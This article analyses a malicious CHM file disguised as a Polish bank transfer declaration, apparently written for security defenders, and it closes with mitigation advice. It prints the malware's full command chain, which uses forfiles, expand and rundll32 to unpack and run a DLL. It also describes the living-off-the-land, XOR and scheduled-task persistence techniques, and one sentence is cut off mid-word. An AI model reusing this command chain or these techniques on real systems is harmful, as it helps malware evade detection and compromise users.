In a recent cybersecurity incident, a malicious Microsoft Compiled HTML Help (CHM) file named deklaracja.chm was uploaded from Poland on June 30, 2025. This file, disguised as a bank transfer declaration, demonstrates how outdated documentation formats can be repurposed to deliver sophisticated malware.
Understanding CHM Files
CHM files, introduced by Microsoft in 1997, are compiled HTML documents used for software documentation and user manuals. They consist of compressed HTML pages, images, and JavaScript files, along with a hyperlinked table of contents and an index. Despite being considered obsolete, CHM files remain compatible with modern Windows versions, making them a potential vector for cyberattacks.
Anatomy of the Attack
Upon execution, the deklaracja.chm file opens a help window displaying a benign receipt image to deceive the user. Simultaneously, it executes an obfuscated `index.htm` file containing JavaScript code. This script decodes a lengthy hexadecimal string, dynamically generates HTML content, and silently downloads a disguised cabinet archive (`desktop.mp3`) using the deprecated `
The attack leverages the HTML Help ActiveX control (`adb880a6-d8ff-11cf-9377-00aa003b7a11`) to execute a hidden command chain. It utilizes the legitimate Windows binary `forfiles.exe` to avoid suspicious parent-child process relationships, reflecting a trend in living-off-the-land (LotL) techniques. These methods allow attackers to evade behavioral defenses while achieving code execution on fully patched systems.
Infection Mechanism
The ActiveX control programmatically triggers a command that spawns a minimized command prompt. The following command illustrates the core of the intrusion:
“`
cmd /min /c forfiles /p %temp% /m .tmp /c cmd /c if @fsize==180738 expand @file %temp%\uNT32.dll & rundll32 %temp%\uNT32.dll,#1
“`
Here, `forfiles` searches for a `.tmp` file of a specific size in the `%temp%` directory. Upon finding the file, the `expand` utility unpacks `uNT32.dll` from the cabinet archive, and `rundll32` executes its export function `#1`, launching the downloader.
The `uNT32.dll` file decrypts embedded strings using a 128-byte rotating XOR key and employs WinHTTP to fetch a payload from a remote server. If the downloaded file exceeds a certain size, the excess data is XOR-decrypted into `net32.dll`, stored in `%LocalAppData%\TaskSync\`, and registered as a scheduled task. This process ensures persistence without modifying the registry.
Broader Implications
This incident underscores the evolving tactics of cybercriminals who repurpose legacy file formats to bypass modern security measures. By exploiting CHM files, attackers can blend user interface deception, trusted Windows binaries, and subtle network traffic to establish a foothold in target systems.
Recommendations for Mitigation
To protect against such attacks, consider the following measures:
1. User Education: Train users to recognize and avoid opening unsolicited or suspicious email attachments, especially those with uncommon file extensions like `.chm`.
2. Email Filtering: Configure email security solutions to block or flag emails containing CHM attachments.
3. Endpoint Protection: Deploy advanced endpoint detection and response (EDR) solutions capable of identifying and mitigating LotL techniques.
4. Software Restrictions: Implement application whitelisting to prevent the execution of unauthorized scripts and binaries.
5. Regular Updates: Ensure all software, including operating systems and security tools, are up to date with the latest patches.
By adopting a multi-layered security approach and staying informed about emerging threats, organizations can enhance their resilience against sophisticated cyberattacks.
